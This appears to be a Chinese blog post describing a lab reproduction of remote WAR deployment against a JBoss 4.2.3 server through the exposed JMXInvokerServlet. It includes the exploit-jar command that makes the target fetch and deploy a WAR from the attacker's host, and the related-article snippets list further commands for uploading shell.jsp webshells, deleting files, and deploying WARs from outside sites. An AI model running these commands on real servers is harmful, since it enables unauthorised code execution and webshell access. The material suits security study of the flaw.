复现JBOSS远程部署war包方法二(过程,步骤,说明)

最新推荐文章于 2024-05-11 04:19:48 发布
原创 最新推荐文章于 2024-05-11 04:19:48 发布 · 751 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#中间件 #jboss #windows server #安全漏洞

本文介绍如何通过修改JBOSS的server.xml配置文件来实现任意IP地址的访问,并使用WAR包及特定EXP进行远程部署攻击的过程。
部署运行你感兴趣的模型镜像

首先打开靶机中的jboss
在这里插入图片描述
然后依次进入C:\jboss-4.2.3.GA\server\default\deploy\jboss-web.deployer将其中的server.xml配置文件中的访问IP地址改为任意IP地址(然后重启一下我们的jboss,这里我们的靶机就配置好了)
在这里插入图片描述
然后我们使用攻击主机,首先打开我们主机的phpstudy,将apache服务打开
在这里插入图片描述
将war包传入到我们的www目录下
再将我们设置好的exp下载下来

直接window+R打开运行,输入cmd进入命令行界面
在这里插入图片描述
输入:
java -jar jboss_exploit_fat.jar -i http://192.168.0.200:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.0.1/test3693.war
在这里插入图片描述
然后进入jboss查看一下:
在这里插入图片描述

您可能感兴趣的与本文相关的镜像

GPT-oss:20b

GPT-oss:20b

图文对话
Gpt-oss

GPT OSS 是OpenAI 推出的重量级开放模型,面向强推理、智能体任务以及多样化开发场景

中间件安全系列(五):JBoss高危漏洞深度剖析与实战复现指南
tengyuehou的博客
04-09 1496
CVE-2017-7504是JBoss应用服务器中的一个远程代码执行漏洞,允许攻击者通过JMX Invoker Servlet在未授权的情况下部署恶意WAR,从而获取服务器控制权。
Jboss 靶场攻略
2301_82061181的博客
09-22 897
步骤一:环境搭建docker ps步骤:POC,访问地址返回如下,说明接⼝开放,此接⼝存在反序列化漏洞步骤三:下载 ysoserial ⼯具进⾏漏洞利⽤将反弹shell进⾏base64编码步骤四:服务器设置监听得端⼝步骤五:执⾏命令反弹成功。
JBOSS安装
jdk2008
02-22 260
声名:转载收藏 1、 安装 1.1、软件安装 首先要安装JDK(仅仅安装JRE是不行的,因为JSP页面需要编译),最新的正式版是JDK1.4.2。然后把JBoss的压缩解压到一个目录下,目录名一般是"Jboss_版本号",JBoss目前的最新正式版是JBoss4.0.0(2004年9月20日发布)。下面的配置都是针对JBoss3.2.5。 1.2、环境变量的设置 需要的环境变量有J...
jboss7本地远程部署步骤
08-18
jboss7本地远程部署步骤;详细步骤在里面
jboss xml漏洞exp
07-31
1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://123.232.119.98:9009/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion 3.远程创建文件 java -ja
一台JBoss服务器同时部署多个项目war
张姐姐聊编程
05-31 7200
在公司做的项目是使用Jboss-eap服务器进行部署后端项目所打出来的war,在没有研究这个技术点之前,是一台服务器部署一个项目的war.所以如果是多个项目的话,那么就需要申请多台服务器,非常的浪费资源,所以就要想办法解决啦。原来一直听说过一台jboss服务器可以部署多个war,但是没有尝试过,这次就必须要去做啦。一起来了解一下最后的实现结果吧。
jboss安装并部署war
busijinqudeshen的博客
07-24 2674
进入jboss下standalone/configuration下打开standalone.xml文件,找到如下两个ip修改为0.0.0.0。正常进入部署系统首页,如需要去掉访问名参考Q&A。原文链接:https://blog.csdn.net/qq_35349982/article/details/127091523。2.访问:http://127.0.0.1:9990,输入刚才创建的用户/密码即可进入后台管理页面。2.启动成功的日志如下,打开浏览器访问 http://localhost:8080/
利用 vulhub 的 “jboss/CVE-2017-12149” 靶场,复现 JBoss 反序列化远程代码执行漏洞。通过漏洞上传含恶意代码的 WAR 部署,访问部署后的页面执行系统命令,截图记录 WAR 上传、部署过程及命令执行结果
最新发布
09-20
WAR 上传、部署过程及命令执行结果的关键步骤进行截图记录。例如,在上传 WAR 时,可以截取终端中 `curl` 命令的执行结果;在访问部署后的页面时,截取浏览器中的页面内容;在执行系统命令后,截取命令执行...
JBoss4.0入门实例参考PDF文档
此外,还可能介绍如何使用 Ant 或 Maven 脚本自动化部署过程,如何通过 JBoss 提供的 deployer 工具热部署应用(无需重启服务器),以及如何利用 SAR(Service Archive)扩展服务器功能。 最后,《Getting+...
web中间件漏洞复现
weixin_43999372的博客
03-26 1476
一.Apache Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一 1.解析漏洞 1. 漏洞原理 Apache默认一个文件可以有多个以点分隔的后缀,当右边的后缀无法识别,则继续向左识别,直到发现后缀是php,交给php处理这个文件 2. 漏洞...
jboss-exp.rar
07-22
某大牛写的jboss-exp 1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion 3.远程创建文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean $content$内容是同目录下的shell.jsp文件内容 即:将shell.jsp文件上传到服务器上,最终部署war访问: http://192.168.7.84:10081/myname/index.jsp 如果有mynameok 表示部署成功 使用client.htm客户端进行连接即可(需要修改ip等信息) 4.远程部署war java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war 获得shell地址: http://192.168.7.84:10081/test/shell.jsp 5.远程删除文件D:\jboss\server\default\deploy\management\myname.war\index.jsp文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 6.支持输入用户名和密码 带验证的情况 java -jar jboss_exploit_fat.jar -u name -p password -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 7.支持代理模式 java -jar jboss_exploit_fat.jar -P http://127.0.0.1:8080 -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
JBoss安装并部署war
飞奔的屎壳郎
09-28 9079
进入jboss下standalone/configuration下打开standalone.xml文件,找到如下两个ip修改为0.0.0.0。1、在jboss的\standalone\configuration目录下有个standalone.xml文件,里边配置相关的端口等;2. 本文章以jboss-eap-7.2版本为例,jboos版本在Window与Linux下通用。jboos 7版本的目录结构,每个大版本目录结构会有所差异。解压Jboss以后在Jboss的bin目录下找到。
JBOSS各版本远程部署方法
执着之道
10-24 266
为了方便快速调试代码,大家都会使用远程部署,郁闷的是JBOSS各个版本远程部署的方式还不一样。所以在这里记录下JBOSS各个版本远程部署方法,免得太多的JAVA同学花时间研究。 [b]JBOSS5.1的远程部署配置[/b]。在server\default\conf\bootstrap目录下profile.xml文件里,加上需要远程部署的路径,如E:/java/Umpspace/conf...
Tomcat 或 Jboss 部署WAR
热门推荐
oyzl68的专栏
11-03 2万+
从Tomcat 7开始,WEB-INF目录下面不再生成web.xml!也不再需要它,所以不需要像网上别的文章说的那样手动建立web.xml文件!! 确定一点:Tomcat根目录为webapps 事实上,只需要使用Eclipse的Export功能导出项目为WAR文件,然后把WAR文件拷贝到Tomcat的webapps  (X:\ {apache-tomcat-目录} \webapps\ )下
Jboss远程命令执行部署war以及如何开启口令防御。
qfslyy的博客
12-21 474
接上一个文章,另一种部署war方式:远程命令执行部署war,以及如何开启口令,提高安全。 远程命令执行部署war: 待定 1:jbos exp 防御,主要改三个地方 1:定义用户密码的: 2:改这个文件 取消注释 3: 最下面取消security的注释。: 重启服务之后,再次访问便需要口令了: ...
复现JBOSS远程部署war过程步骤说明
XZ_______的博客
12-21 1842
实验环境: 一台配置好jboss环境的windows server 2003靶机 一台装有phpstudy的攻击主机 实验说明: 两台主机可以互相ping通 实验步骤: 首先打开靶机中的jboss 然后依次进入C:\jboss-4.2.3.GA\server\default\deploy\jboss-web.deployer将其中的server.xml配置文件中的访问IP地址改为任意IP地址(然后重启一下我们的jboss,这里我们的靶机就配置好了) 然后我们使用攻击主机,首先打开我们主机的phpstud
Jboss部署
Judy-命中注定与众不同
03-14 3243
介绍 有很多种方法可以部署应用程序,你可以通过命令行界面,Web控制台,Maven插件,JBossTools 部署到命令服务器和托管域服务器,甚至可以部署到你自己部署的服务器,下面是几种方式,欢迎大家与我随时交流~ 一 控制台部署 首先启动我们的服务器,然后使用http://127.0.0.1:9990/console/App.html网址我们就可以进入我们Jboss的平台。这个时候...
Java最新java 表情符过滤,意外的惊喜
2401_84688180的博客
05-11 542
面试难免让人焦虑不安。经历过的人都懂的。但是如果你提前预测面试官要问你的问题并想出得体的回答方式,就会容易很多。此外,都说“面试造火箭,工作拧螺丝”,那对于准备面试的朋友,你只需懂一个字:刷!给我刷刷刷刷,使劲儿刷刷刷刷刷!今天既是来谈面试的,那就必须得来整点面试真题,这不花了我整28天,做了份“Java一线大厂高岗面试题解析合集:JAVA基础-中级-高级面试+SSM框架+分布式+性能调优+微服务+并发编程+网络+设计模式+数据结构与算法等”
JBOSS远程部署war漏洞复现
小小猪的博客
11-22 1027
JBOSS远程部署war漏洞复现 框架介绍: 是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用 漏洞复现: 第一种: 访问页面之后,点击。 进入到控制页面后我们点击 找到我们的add URL 将我们的www目录下的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不爱学习的安全小白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值